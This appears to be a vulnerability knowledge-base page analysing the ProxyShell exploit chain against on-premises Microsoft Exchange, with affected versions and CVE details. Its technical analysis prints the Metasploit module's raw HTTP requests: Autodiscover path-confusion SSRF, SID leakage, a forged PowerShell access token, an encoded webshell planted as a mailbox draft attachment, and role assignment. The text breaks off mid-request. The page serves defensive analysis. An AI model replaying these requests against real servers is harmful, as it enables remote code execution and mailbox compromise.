Very High
ProxyShell Exploit Chain
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)High
(1 user assessed)Unknown
Unknown
Unknown
ProxyShell Exploit Chain
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
Details are available in Orange Tsai’s Black Hat USA 2020 talk and follow-on blog series. ProxyShell is being broadly exploited in the wild as of August 12, 2021.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityHigh
Technical Analysis
Check out the Rapid7 analysis for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I’d imagine folks are going to start finding ways around that soon.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
Vendors
- Microsoft
Products
- Microsoft Exchange Server 2013 Cumulative Update 23,
- Microsoft Exchange Server 2019 Cumulative Update 9,
- Microsoft Exchange Server 2016 Cumulative Update 20,
- Microsoft Exchange Server 2016 Cumulative Update 19,
- Microsoft Exchange Server 2019 Cumulative Update 8
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this report- Vendor Advisory
- Government or Industry Alert
- Threat Feed
- News Article or Blog
- Personally observed in an environment
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
On August 5, 2021, in a Black Hat USA talk, DEVCORE researcher Orange Tsai shared information on several exploit chains targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented was ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. Multiple researchers have detected widespread opportunistic scanning and exploitation of Exchange servers using the ProxyShell chain. Both public and private proof-of-concept exploit code is available.
ProxyShell allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit chains three CVEs that, when chained, allow the attacker to bypass ACL controls, send a request to a PowerShell back end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution.
While ProxyShell and March’s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors.
ProxyShell chain CVEs:
- CVE-2021-34473, a remote code execution vulnerability patched April 13, 2021
- CVE-2021-34523, an elevation of privilege vulnerability patched April 13, 2021
- CVE-2021-31207, a security feature bypass patched May 11, 2021
While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft’s advisories note that they were inadvertently omitted from publication until July.
Note: There has been confusion about which CVE is which across various advisories and research descriptions—Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but Orange Tsai’s Black Hat slides list CVE-2021-34473 as the initial ACL bypass. Community researchers have also expressed confusion over CVE numbering across the ProxyShell chain.
Affected products
The following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:
- Microsoft Exchange Server 2019 Cumulative Update 9
- Microsoft Exchange Server 2019 Cumulative Update 8
- Microsoft Exchange Server 2016 Cumulative Update 20
- Microsoft Exchange Server 2016 Cumulative Update 19
- Microsoft Exchange Server 2013 Cumulative Update 23
Exploit chain analysis
Some requests have been omitted for brevity.
The ProxyShell exploit chain, as implemented by the Metasploit module, begins by leaking a known user’s legacy DN from the Autodiscover service. In this case, the known user is smcintyre@exchg.lan
, and the resulting legacy DN is /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre
.
[*] Sending autodiscover request #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/autodiscover/autodiscover.xml HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: text/xml; charset=utf-8 Content-Length: 371 <?xml version="1.0" encoding="utf-8"?> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>smcintyre@exchg.lan</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/10.0 request-id: c143229e-7884-48f3-8506-839e795ef39f X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-DiagInfo: WIN-BPID95ACQ7E X-BEServer: WIN-BPID95ACQ7E X-AspNet-Version: 4.0.30319 Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 3890 <?xml version="1.0" encoding="utf-8"?> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006"> <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <User> <DisplayName>Spencer McIntyre</DisplayName> <LegacyDN>/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre</LegacyDN> <AutoDiscoverSMTPAddress>smcintyre@exchg.lan</AutoDiscoverSMTPAddress> <DeploymentId>63b273d5-83e6-4f6b-aab1-0930d3c878be</DeploymentId> </User> <Account> <AccountType>email</AccountType> <Action>settings</Action> <MicrosoftOnline>False</MicrosoftOnline> <Protocol> <Type>EXCH</Type> <Server>cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan</Server> <ServerDN>/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan</ServerDN> <ServerVersion>73C18880</ServerVersion> <MdbDN>/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan/cn=Microsoft Private MDB</MdbDN> <PublicFolderServer>win-bpid95acq7e.exchg.lan</PublicFolderServer> <AD>WIN-BPID95ACQ7E.exchg.lan</AD> <ASUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</ASUrl> <EwsUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</EwsUrl> <EmwsUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</EmwsUrl> <EcpUrl>https://win-bpid95acq7e.exchg.lan/owa/</EcpUrl> <EcpUrl-um>?path=/options/callanswering</EcpUrl-um> <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr> <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=exchg.lan</EcpUrl-mt> <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret> <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms> <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo> <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=exchg.lan</EcpUrl-tm> <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=exchg.lan</EcpUrl-tmCreating> <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=exchg.lan</EcpUrl-tmEditing> <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall> <OOFUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</OOFUrl> <UMUrl>https://win-bpid95acq7e.exchg.lan/EWS/UM2007Legacy.asmx</UMUrl> <OABUrl>https://win-bpid95acq7e.exchg.lan/OAB/30ff0e0d-10d6-4f13-aad5-00857bcb65dc/</OABUrl> <ServerExclusiveConnect>off</ServerExclusiveConnect> </Protocol> <Protocol> <Type>EXPR</Type> <Server>win-bpid95acq7e.exchg.lan</Server> <SSL>Off</SSL> <AuthPackage>Ntlm</AuthPackage> <ServerExclusiveConnect>on</ServerExclusiveConnect> <CertPrincipalName>None</CertPrincipalName> <GroupingInformation>Default-First-Site-Name</GroupingInformation> </Protocol> <Protocol> <Type>WEB</Type> <Internal> <OWAUrl AuthenticationMethod="Basic, Fba">https://win-bpid95acq7e.exchg.lan/owa/</OWAUrl> <Protocol> <Type>EXCH</Type> <ASUrl>https://win-bpid95acq7e.exchg.lan/EWS/Exchange.asmx</ASUrl> </Protocol> </Internal> </Protocol> </Account> </Response> </Autodiscover> [*] Server: cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan [*] LegacyDN: /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre
Next, the legacy DN is fed to a MAPI-over-HTTP request in order to leak the user’s SID. The resulting SID for smcintyre@exchg.lan
is S-1-5-21-2800676829-2777257591-1686523126-1000
. This information is later used to forge an access token.
[*] Sending mapi request #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/mapi/emsmdb HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net X-RequestType: Connect X-ClientInfo: {0064DC00-7E9D-E4FD-388B-EFF21747C74C} X-ClientApplication: Outlook/15.0.4815.1002 X-RequestId: {8A6CFECB-FF20-F8DB-B3FD-06E3256E303B}:22322 Content-Type: application/mapi-http Content-Length: 145 /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre� #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Content-Type: application/mapi-http Server: Microsoft-IIS/10.0 request-id: 97949297-5ce8-402e-a30d-efba108a8b9b X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-ServerApplication: Exchange/15.01.2176.002 X-RequestId: {8A6CFECB-FF20-F8DB-B3FD-06E3256E303B}:22322 X-ClientInfo: {0064DC00-7E9D-E4FD-388B-EFF21747C74C} X-RequestType: Connect X-TunnelExpirationTime: 1800000 X-PendingPeriod: 30000 X-ExpirationInfo: 300000 X-ResponseCode: 0 X-DiagInfo: WIN-BPID95ACQ7E X-BEServer: WIN-BPID95ACQ7E X-AspNet-Version: 4.0.30319 Set-Cookie: MapiRouting=UlVNOmY3YTFjMjU4LTFhODQtNGIzOC1hMjU0LTk4NWVlODdhM2M3OTqKE2BvfGLZCA==; path=/mapi/; secure; HttpOnly, MapiContext=MAPIAAAAAPK79diayoPH/suKyZiv6sn7y/nI5dXtwPHJ6djv1eDW7N7mvJ+omq6Yr5yrm6KFAAAAAAAAAA==; path=/mapi/emsmdb; secure; HttpOnly, MapiSequence=0-jHA9Yg==; path=/mapi/emsmdb; secure; HttpOnly, X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT Content-Length: 1152 PROCESSING DONE X-StartTime: Wed, 18 Aug 2021 19:14:43 GMT X-ElapsedTime: 6 � CWIN-BPID95ACQ7E.exchg.laF �KClientAccessServer=WIN-BPID95ACQ7E.exchg.lan,ConnectTime=8/18/2021 3:14:43 PM,ConnectionID=134 � $IMicrosoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '/o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre' with SID S-1-5-21-2800676829-2777257591-1686523126-1000 and MasterAccountSid (StoreError=LoginPerm) at Microsoft.Exchange.RpcClientAccess.Server.UserManager.User.CorrelateIdentityWithLegacyDN(ClientSecurityContext clientSecurityContext) at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.<>c__DisplayClass47_0.<Connect>b__3() at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.ExecuteWrapper(Func`1 getExecuteParameters, Func`1 executeDelegate, Action`1 exceptionSerializationDelegate) [*] SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
wvu@kharak:~$ echo VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA | base64 -d | xxd 00000000: 5601 0054 0757 696e 646f 7773 4300 4108 V..T.WindowsC.A. 00000010: 4b65 7262 6572 6f73 4c13 736d 6369 6e74 KerberosL.smcint 00000020: 7972 6540 6578 6368 672e 6c61 6e55 2e53 yre@exchg.lanU.S 00000030: 2d31 2d35 2d32 312d 3238 3030 3637 3638 -1-5-21-28006768 00000040: 3239 2d32 3737 3732 3537 3539 312d 3136 29-2777257591-16 00000050: 3836 3532 3331 3236 2d31 3030 3047 0100 86523126-1000G.. 00000060: 0000 0700 0000 0c53 2d31 2d35 2d33 322d .......S-1-5-32- 00000070: 3534 3445 0000 0000 544E.... wvu@kharak:~$
Leveraging EWS impersonation, a webshell is specially encoded and then stored in the user’s mailbox as an attachment to a saved draft. The webshell allows for the execution of arbitrary commands.
#################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/ews/exchange.asmx HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: text/xml;charset=UTF-8 Content-Length: 1612 <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <t:RequestServerVersion Version="Exchange2016" /> <t:SerializedSecurityContext> <t:UserSid>S-1-5-21-2800676829-2777257591-1686523126-1000</t:UserSid> <t:GroupSids> <t:GroupIdentifier> <t:SecurityIdentifier>S-1-5-21</t:SecurityIdentifier> </t:GroupIdentifier> </t:GroupSids> </t:SerializedSecurityContext> </soap:Header> <soap:Body> <m:CreateItem MessageDisposition="SaveOnly"> <m:Items> <t:Message> <t:Subject>QiCa8qDMK1</t:Subject> <!-- todo: make these fields totes legit --> <t:Body BodyType="HTML"></t:Body> <t:Attachments> <t:FileAttachment> <t:Name>ut_est.rtf</t:Name> <t:IsInline>false</t:IsInline> <t:IsContactPhoto>false</t:IsContactPhoto> <t:Content>MJXWVIa3aRQ5zakG3/ep39r/lmFnVIa3aRSWOYb3BqkU/5bW2oal2oaW2V33BlQUt9MGObmp39opINOpDYzJ6dqlqc2Mvtpc99rWFH6WRlttXC0oXWGWD2uW9wbWqV3alskxIZX71lSGt2kU2Q==</t:Content> </t:FileAttachment> </t:Attachments> <t:ToRecipients> <t:Mailbox> <t:EmailAddress>lillie@cassin.co</t:EmailAddress> </t:Mailbox> </t:ToRecipients> </t:Message> </m:Items> </m:CreateItem> </soap:Body> </soap:Envelope> #################### # Response: #################### HTTP/1.1 200 OK Cache-Control: private Transfer-Encoding: chunked Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/10.0 request-id: 79055639-a812-46d4-afb1-63dbb8ab8f61 X-CalculatedBETarget: win-bpid95acq7e.exchg.lan X-DiagInfo: WIN-BPID95ACQ7E X-BEServer: WIN-BPID95ACQ7E X-AspNet-Version: 4.0.30319 Set-Cookie: exchangecookie=b5c02db0ac974bdd913a1fbb1f310fc2; expires=Thu, 18-Aug-2022 19:14:43 GMT; path=/; HttpOnly, X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:43 GMT; path=/Autodiscover; secure; HttpOnly X-Powered-By: ASP.NET X-FEServer: WIN-BPID95ACQ7E Date: Wed, 18 Aug 2021 19:14:43 GMT <?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Header><h:ServerVersionInfo MajorVersion="15" MinorVersion="1" MajorBuildNumber="2176" MinorBuildNumber="2" Version="V2017_07_11" xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/></s:Header><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><m:CreateItemResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"><m:ResponseMessages><m:CreateItemResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode><m:Items><t:Message><t:ItemId Id="AAMkAGNjY2I5NGUwLTMxNzUtNGVjOS04ZThhLTYyNjc5ZDg3NDM4NABGAAAAAADyTxREGt41Q6z6KZqfeXqwBwCk4ApHvBQ0QbSbHuMHQlaiAAAAAAEPAACk4ApHvBQ0QbSbHuMHQlaiAACPmv2vAAA=" ChangeKey="CQAAABYAAACk4ApHvBQ0QbSbHuMHQlaiAACPmwCf"/><t:Attachments><t:FileAttachment><t:AttachmentId Id="AAMkAGNjY2I5NGUwLTMxNzUtNGVjOS04ZThhLTYyNjc5ZDg3NDM4NABGAAAAAADyTxREGt41Q6z6KZqfeXqwBwCk4ApHvBQ0QbSbHuMHQlaiAAAAAAEPAACk4ApHvBQ0QbSbHuMHQlaiAACPmv2vAAABEgAQAB7XeOl5YbxOur9FB/Y1glY="/></t:FileAttachment></t:Attachments></t:Message></m:Items></m:CreateItemResponseMessage></m:ResponseMessages></m:CreateItemResponse></s:Body></s:Envelope>
Setting the X-Rps-CAT
request parameter to the forged access token documented earlier enables access to Exchange PowerShell remoting. Using the New-ManagementRoleAssignment
cmdlet, the Mailbox Import Export
role is assigned to the user being impersonated.
[*] Assigning the 'Mailbox Import Export' role #################### # Request: #################### POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1 Host: 192.168.159.42 User-Agent: Mozilla/5.0 Cookie: none Accept: */* Cache-Control: no-cache Connection: keep-alive Content-Type: application/soap+xml;charset=UTF-8 Content-Length: 12138 <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:1FA7A332-BF9E-41D5-A0A6-DB3445500A88</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action><w:OptionSet env:mustUnderstand="true"><w:Option Name="protocolversion" MustComply="true">2.3</w:Option></w:OptionSet></env:Header><env:Body><rsp:Shell ShellId="DC0360BA-4A8C-4EF8-ADF1-012F7296DFF9" Name="Runspace"><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAEAAAAAAAAAAAMAAADhAgAAAAIAAQC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxWZXJzaW9uIE49InByb3RvY29sdmVyc2lvbiI+Mi4zPC9WZXJzaW9uPgogICAgPFZlcnNpb24gTj0iUFNWZXJzaW9uIj4yLjA8L1ZlcnNpb24+CiAgICA8VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj4KICA8L01TPgo8L09iaj4KAAAAAAAAAAIAAAAAAAAAAAMAAB0VAgAAAAQAAQC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxJMzIgTj0iTWluUnVuc3BhY2VzIj4xPC9JMzI+CiAgICA8STMyIE49Ik1heFJ1bnNwYWNlcyI+MTwvSTMyPgogICAgPE9iaiBOPSJQU1RocmVhZE9wdGlvbnMiIFJlZklkPSIxIj4KICAgICAgPFROIFJlZklkPSIwIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QU1RocmVhZE9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+RGVmYXVsdDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8T2JqIE49IkFwYXJ0bWVudFN0YXRlIiBSZWZJZD0iMiI+CiAgICAgIDxUTiBSZWZJZD0iMSI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iQXBwbGljYXRpb25Bcmd1bWVudHMiIFJlZklkPSIzIj4KICAgICAgPFROIFJlZklkPSIyIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTUHJpbWl0aXZlRGljdGlvbmFyeTwvVD4KICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxEQ1Q+CiAgICAgICAgPEVuPgogICAgICAgICAgPFMgTj0iS2V5Ij5QU1ZlcnNpb25UYWJsZTwvUz4KICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI0Ij4KICAgICAgICAgICAgPFROUmVmIFJlZklkPSIyIiAvPgogICAgICAgICAgICA8RENUPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjUuMC4xMTA4Mi4xMDAwPC9WZXJzaW9uPgogICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgPFMgTj0iS2V5Ij5QU0NvbXBhdGlibGVWZXJzaW9uczwvUz4KICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI1Ij4KICAgICAgICAgICAgICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uVmVyc2lvbltdPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5BcnJheTwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgICAgICA8TFNUPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjEuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj4yLjA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgICAgICAgPFZlcnNpb24+My4wPC9WZXJzaW9uPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjQuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj41LjAuMTEwODIuMTAwMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+Q0xSVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj40LjAuMzAzMTkuNDIwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4xMC4wLjExMDgyLjEwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPldTTWFuU3RhY2tWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNSZW1vdGluZ1Byb3RvY29sVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4yLjM8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjEuMS4wLjE8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgPC9EQ1Q+CiAgICAgICAgICA8L09iaj4KICAgICAgICA8L0VuPgogICAgICA8L0RDVD4KICAgIDwvT2JqPgogICAgPE9iaiBOPSJIb3N0SW5mbyIgUmVmSWQ9IjYiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJfaG9zdERlZmF1bHREYXRhIiBSZWZJZD0iNyI+CiAgICAgICAgICA8TVM+CiAgICAgICAgICAgIDxPYmogTj0iZGF0YSIgUmVmSWQ9IjgiPgogICAgICAgICAgICAgIDxUTiBSZWZJZD0iNCI+CiAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4KICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgIDxEQ1Q+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij45PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI5Ij4KICAgICAgICAgICAgICAgICAgICA8T